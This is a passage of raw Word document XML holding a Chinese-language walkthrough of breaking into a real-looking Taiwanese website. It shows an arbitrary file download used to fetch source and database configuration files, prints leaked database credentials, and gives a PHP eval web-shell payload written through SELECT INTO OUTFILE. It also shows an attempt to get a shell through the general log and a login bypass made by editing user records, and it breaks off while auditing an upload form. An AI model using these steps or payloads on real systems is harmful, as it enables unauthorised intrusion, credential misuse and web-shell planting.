        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/* Advanced phpMyAdmin features */</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>$cfg['Servers'][$i]['pmadb'] = 'phpmyadmin';</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>$cfg['Servers'][$i]['bookmarktable'] = 'pma_bookmark';</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>$cfg['Servers'][$i]['relation'] = 'pma_relation';</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>$cfg['Servers'][$i]['table_info'] = 'pma_table_info';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724FAFD7" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>继续下载了其他几个文件，没有什么特别的利用价值，回想到之前下载的文件，里面有许多的目录名字，结合当前站的目录，会不会有其他站点？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7619CCA7" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>http://www.root.org.tw/home12/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD251E" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>home13</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home2</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home3</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home3_test01</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home4</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home5</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home8</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715D2E2" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>fofa插件搜一搜，好多其他站点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B47D98E" w14:textId="56147383" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="677ABF24" wp14:editId="442EE503">
            <wp:extent cx="5274310" cy="2992755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1999393192" name="图片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9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1F1EE" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>那就从其他站点下手，简单的看了一下没什么可利用的，后来想了想最近开发学的知识，一般的MVC模式，会在index文件中，包含一个初始框架类，在框架类中自动包含数据库配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045B0D08" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>&lt;?php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//(0)Home应用常量定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>define("DS",DIRECTORY_SEPARATOR);</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//斜线(/、\)，根据操作系统决定</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>define("ROOT_PATH",getcwd().DS);</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//网站根目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>define("APP_PATH",ROOT_PATH."Home".DS);</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//应用目录、平台目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//(1)包含核心框架类文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>require(ROOT_PATH."Frame".DS."Frame.class.php");</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//(2)框架初始化</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>\Frame\Frame::run();</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340FB004" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>Frame.class.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E06790" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//私有的静态的初始化配置文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> private static function initConfig()</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> {</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  $GLOBALS['config'] = require_once(APP_PATH."Conf".DS."Config.php");</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F1DE8C" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>看了看这个站，也没有用mcv思想，但是你必须要加载配置文件连接数据库，盲猜index.php是否包含数据库文件,下载之后果然发现配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F37587" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>include('top.inc');</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>include('database.inc');</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>$msgdir='../language';</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>$msgfile='index';</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>include('msg.inc');</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>include('cut.inc');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F09F9F" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>而且在开头列出来网站的大体目录结构(搞完站点之后，分析一下下载页面的逻辑结构)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08287FF7" w14:textId="1A7F40B9" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B03C67B" wp14:editId="6DEF9049">
            <wp:extent cx="5274310" cy="2555240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1553968054" name="图片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图片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C1DB1C" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>直接下载文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFF735F" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>download.php?f=/home12/database.inc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F9F82D" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>下载下来目录为空，路径错了，可是明明在index文件下直接包含，而且index文件在/home12目录下。继续找路径，在上面的图片发现include文件下有许多inc文件，database会不会也在改目录下？尝试一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB2A925" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>download.php?f=/home12/include.inc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0FBF44" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>最后拿到数据库账号密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092970D8" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>  $sqlServerIp = 'localhost';  // sql server ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  $userName = 'arco';   // sql login name</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  $passWord = 'su3cl3';   // sql login password</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  $dbName = 'mdn';   // sql database name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DAB97B" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>最后直接登录phpadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030A6134" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>获取shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403FC03D" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phpadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BEAE6A" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>SHOW GLOBAL VARIABLES LIKE "%secure%"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76360992" w14:textId="3F1B07BD" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AE246EF" wp14:editId="71615C33">
            <wp:extent cx="5274310" cy="1351915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="97752592" name="图片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图片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351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A29EA" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>为空，表示对目录没有限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C6C3DD" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>select '&lt;?php @eval($_POST[pass]);?&gt;' into outfile '/home12/9847/shell.php';  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34549E32" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>权限不允许</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D45C4C0" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>#1045 - Access denied for user 'arco'@'localhost' (using password: YES)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6899B265" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>在information.USER_PRIVILEGES表中发现该用户的权限很少。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5DB2D1" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>   GRANTEE        TABLE_CATALOG    PRIVILEGE_TYPE    IS_GRANTABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>'arco'@'localhost'  NULL             CREATE TEMPORARY      TABLES NO</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>'arco'@'localhost'  NULL              LOCK                 TABLES NO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A1EBDF" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>既然没权限日志也不能拿shell，还是试试吧。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E28BDF" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:lastRenderedPageBreak/>
        <w:t>日志拿shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581CDD40" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>show global variables like "%genera%";                      //查询general_log配置`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6660C806" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>Variable_name Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>general_log OFF</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>general_log_file /data/mysql5/var/db.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E67DF9" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>set global general_log='on';                                //开启general log模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7B9399" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>#1227 - Access denied; you need the SUPER privilege for this operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DA1BC4" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>文件上传与文件包含</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6767F71B" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>phpadmin拿不到尝试后台能不能拿到shell，数据库配置文件已经拿到了，但是表太多了无法找到用户账号密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7FBCE6" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>  $sqlServerIp = 'localhost';  // sql server ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  $userName = 'arco';   // sql login name</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  $passWord = 'su3cl3';   // sql login password</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  $dbName = 'mdn';   // sql database name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317E8139" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>这里下载代码找一下slq语句执行的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D302DFD" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>/home12/login/index.php?sid=9846</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C612B4A" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>&lt;FORM name=form1 action='login0.php' method=post target=tmp&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C66A55" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>包含一下文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EA1E6A" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>/home/login/login0.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749D92AF" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t> $dm1_sql = "select uid,type from a_users where logid='$user' and pwd='$pass'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C113D08" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>输入账户密码，我还自己添加了一个admin/admin，但是死活进不去，查看了数据库结构其中也个选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F46AE" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>status 1:帐号冻结 2:幽灵帐号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2754D6" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>所有的账户status值都是0，该选项不会影响，直接审计一下源码吧。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE3E22" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t> include('dm1.inc');</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> $dtype = dm1('dtype', 0);</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> if ($type == 1) :</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  $type = 99;</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> else :</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  $dm1_sql = "select type from a_belong where uid='$uid' and sid='{$sys['sid']}'";</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//&amp;  $dm1_sql = "select type from belong where uid='$uid' and sid='{$sys['sid']}'";</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  include('dm1.inc');</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  if ($dm1_count == 0) :</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>   echo "alert('帳號或密碼錯誤');\n";</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>   exit ($end);</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  endif;</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  $type = dm1('type', 0);</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> endif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD24E27" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t> if (! $dm1_data = @mysql_query($dm1_sql)) :</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  exit("&lt;script&gt;alert(\"can not open\\n$dm1_sql\\n[$SCRIPT_NAME] " . mysql_error() . "\");&lt;/script&gt;");</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:lastRenderedPageBreak/>
        <w:t> endif;</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> $dm1_count = mysql_num_rows($dm1_data);</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> if (! function_exists('dm1')) :</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  function dm1($x,$y){</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>   global $dm1_data,$dm1_count;</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>   if ($dm1_count == 0) :</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>    return '';</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>   else :</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>    return trim(mysql_result($dm1_data, $y, $x));</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>   endif;</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>  };</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> endif;</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720D2A06" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>一开始没看出来，后来仔细一看数据库语句出现了问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E120BC2" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>$dm1_sql = "select type from belong where uid='$uid' and sid='{$sys['sid']}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1559FAC1" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>这里select出的是tpye，回头看数据库中的所有用户账户type都是0，直接数据库改一下为1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F57988" w14:textId="5AE9527F" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25C8082E" wp14:editId="2544C940">
            <wp:extent cx="5274310" cy="1617345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1596287914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617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4431D1" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>最后直接登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56380FD7" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>登录之后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4A10B" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>funn/index.php?go=a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7562F916" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>可以上传头像，但是只允许gif、jpg，代码审计一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FAB5E1" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>a.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D20605D" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>     &lt;?</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>      if (isset($go)):</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
